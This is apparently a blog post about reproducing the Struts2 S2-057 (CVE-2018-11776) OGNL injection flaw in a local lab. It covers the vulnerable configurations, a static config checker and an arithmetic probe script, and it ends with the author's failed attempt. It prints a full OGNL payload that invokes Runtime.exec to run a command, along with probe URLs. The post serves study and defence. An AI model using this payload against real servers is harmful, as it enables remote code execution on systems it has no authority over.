S2-057 Local reproduction

This afternoon I was unhurriedly testing my Android app when a Struts2 vulnerability suddenly dropped, and my heart skipped a beat: no way, in last month's work report I was still bragging that since Struts2 upgraded OGNL it has become hard to get arbitrary command execution out of improper OGNL parsing. See the original post:
https://blog.csdn.net/u013224189/article/details/81091874
Feeling uneasy, I looked at the vulnerability information, and damn it, it really is that very spot. The 2.3-series release Struts2 put out in July blocked the namespace, and the latest 2.5 release in August blocks the same spot; in short, the idea is to stop taking the namespace value straight from the URI and passing it into the program to be parsed as an OGNL expression when nothing has been configured correctly.
Being a noob, I never managed to construct an attack scenario myself, but this time the researchers who found the vulnerability have posted the details right on their blog:
https://semmle.com/news/apache-struts-CVE-2018-11776
https://lgtm.com/blog/apache_struts_CVE-2018-11776
According to their description, a Struts2 application can be vulnerable in the following two situations:
1) When the namespace value is not set for a result defined in the underlying xml configuration, and at the same time its upper action(s) configurations have no namespace or a wildcard namespace, RCE is possible.

2) The same is possible when using a url tag which has neither value nor action set, and at the same time its upper action(s) configurations have no namespace or a wildcard namespace; the namespace condition is the same as in the first case.
An application matching either of the following scenarios may be exploitable:
Scenario one:
<struts>
  <package ....>
    <action name="a1">   <!-- no namespace configured here, or a wildcard namespace such as /* -->
      <result type="redirectAction">  <!-- result type is redirectAction -->
        <param name="actionName">a2.action</param>
      </result>
    </action>
  </package>
</struts>

Scenario two (a url tag with neither value nor action set):
<s:url includeParams="get">
  <s:param name="id" value="%{'22'}" />
</s:url>
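The two scenarios above are what a review of an application's Struts configuration should look for. What follows is an added example, not code from the original post, from Semmle's write-up, or from the Struts project: a small static check, run over a constructed struts.xml, that flags scenario one (a redirectAction or chain result without a namespace param inside a package whose namespace is missing or a wildcard) together with the struts.mapper.alwaysSelectFullNamespace constant, which is the setting that makes Struts read the namespace out of the request URI in the first place. Scenario two lives in JSP url tags and is not covered by this check. The package names, both file contents and the hardened variant are all constructed for the example; the hardened one simply gives the package an explicit namespace and the result an explicit namespace param.

```python
# Added example (not from the original post or any Struts project code): a static
# check for the "scenario one" conditions of S2-057 over an inline struts.xml.
import xml.etree.ElementTree as ET

# A missing namespace or a wildcard one lets the URI supply the namespace.
WILDCARD_NS = {"", "/*", "*"}
# Result types that take their target namespace from the current namespace
# when no <param name="namespace"> is given (redirectAction is the type named
# on the page; chain is treated the same way, as in the showcase actionChain PoC).
RESULT_TYPES = {"redirectAction", "chain"}

# Constructed struts.xml reproducing the page's scenario one (package name is made up).
VULNERABLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="demo" extends="struts-default">
    <action name="a1">
      <result type="redirectAction">
        <param name="actionName">a2.action</param>
      </result>
    </action>
  </package>
</struts>"""

# Constructed hardened variant: explicit namespaces everywhere, constant off.
HARDENED_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="false"/>
  <package name="demo" namespace="/demo" extends="struts-default">
    <action name="a1">
      <result type="redirectAction">
        <param name="actionName">a2</param>
        <param name="namespace">/demo</param>
      </result>
    </action>
  </package>
</struts>"""


def find_s2_057_candidates(struts_xml):
    """Return one finding string per risky spot; an empty list means nothing flagged."""
    root = ET.fromstring(struts_xml)
    findings = []

    # 1. The mapper setting that turns the URI prefix into the namespace.
    for const in root.iter("constant"):
        if (const.get("name") == "struts.mapper.alwaysSelectFullNamespace"
                and const.get("value", "").strip().lower() == "true"):
            findings.append("struts.mapper.alwaysSelectFullNamespace=true: "
                            "namespace is read from the request URI")

    # 2. Packages with no/wildcard namespace containing results that inherit it.
    for pkg in root.iter("package"):
        pkg_ns = pkg.get("namespace", "").strip()
        if pkg_ns not in WILDCARD_NS:
            continue
        for action in pkg.iter("action"):
            for result in action.iter("result"):
                if result.get("type") not in RESULT_TYPES:
                    continue
                params = {p.get("name"): (p.text or "").strip()
                          for p in result.findall("param")}
                if not params.get("namespace"):
                    findings.append(
                        "package %r (namespace %r): action %r has a %s result "
                        "with no namespace param"
                        % (pkg.get("name"), pkg_ns, action.get("name"), result.get("type")))
    return findings


if __name__ == "__main__":
    for label, xml in (("vulnerable", VULNERABLE_STRUTS_XML), ("hardened", HARDENED_STRUTS_XML)):
        print(label, find_s2_057_candidates(xml) or "no findings")
```

The check is deliberately conservative: a result that names its namespace explicitly, or a package with a concrete namespace, is not reported even if the constant is on, because then the value does not come from the URI.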

For this situation a master has already published a PoC:

https://github.com/jas502n/St2-057/blob/master/README.md

Arbitrary command execution. Thinking of my work report from a month ago, I felt my face had been slapped.
Looking at the PoC the author constructed:

First, using ${(100+100)}:
visiting http://localhost:8888/struts2-showcase/${(100+100)}/actionChain1.action, the OGNL expression is executed successfully and the request is redirected to

http://localhost:8888/struts2-showcase/200/register2.action
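As an added example (not jas502n's PoC and not the post's own code), here is the same arithmetic-evaluation check as a script: it builds the ${(a*b)} namespace segment with two random operands so that the expected number cannot appear in a redirect by accident, sends the request without following the redirect, and reads the evaluated value back out of the Location header exactly where the 200 appears in the URL above. TARGET and ACTION are placeholders taken from the post's showcase URL; the Location headers used in the test are constructed. Nothing is executed on the target beyond a multiplication.

```python
# Added example (not from the original post or the jas502n repository): a
# non-destructive S2-057 probe that only asks the server to evaluate a*b.
import random
import urllib.parse
import urllib.request
from urllib.error import HTTPError

TARGET = "http://localhost:8888/struts2-showcase"   # placeholder from the post's URL
ACTION = "actionChain1.action"                        # showcase action used in the post


def make_probe(a, b):
    """Return the "${(a*b)}" namespace segment and the product we expect back."""
    return "${(%d*%d)}" % (a, b), a * b


def probe_path(target, action, expr):
    """Place the expression in the namespace position: <target>/<expr>/<action>."""
    return target.rstrip("/") + "/" + urllib.parse.quote(expr, safe="") + "/" + action


def location_shows_evaluation(location, expected):
    """True when the redirect's namespace segment (the one before the action)
    is the evaluated number, e.g. /struts2-showcase/200/register2.action."""
    if not location:
        return False
    path = urllib.parse.urlsplit(location).path
    segments = [s for s in path.split("/") if s]
    return len(segments) >= 2 and segments[-2] == str(expected)


class _KeepRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx; we want the raw Location header."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def check_target(target=TARGET, action=ACTION, timeout=10):
    """Send one probe and report whether the namespace was evaluated as OGNL."""
    a, b = random.randint(1000, 9999), random.randint(1000, 9999)
    expr, expected = make_probe(a, b)
    url = probe_path(target, action, expr)
    opener = urllib.request.build_opener(_KeepRedirect)
    try:
        resp = opener.open(url, timeout=timeout)
        location = resp.headers.get("Location")
    except HTTPError as err:           # urllib raises on the unfollowed 302
        location = err.headers.get("Location")
    return location_shows_evaluation(location, expected)


if __name__ == "__main__":
    print("namespace evaluated as OGNL:", check_target())
```

A server that is not vulnerable either answers with the expression untouched in the Location header (URL-encoded or not) or does not redirect at all; both cases come back as False. The operands are percent-encoded because Tomcat decodes the path before Struts maps it, and the multiplication avoids the `+` sign, whose handling inside a path segment is less predictable than a plain `*`.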

But when I run the following PoC, I never get my lovely calculator:

${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#jas502n.println(#d),#jas502n.close())}

It looks very much like the S2-032 PoC, and the author says as much.
I tested it locally, but still could not pop the calculator.
The error shown while debugging:
ognl.OgnlException: Eval expression / chained expressions have been disabled

Could some expert who has got it working help me with an answer?



Origin: https://blog.csdn.net/u013224189/article/details/81980518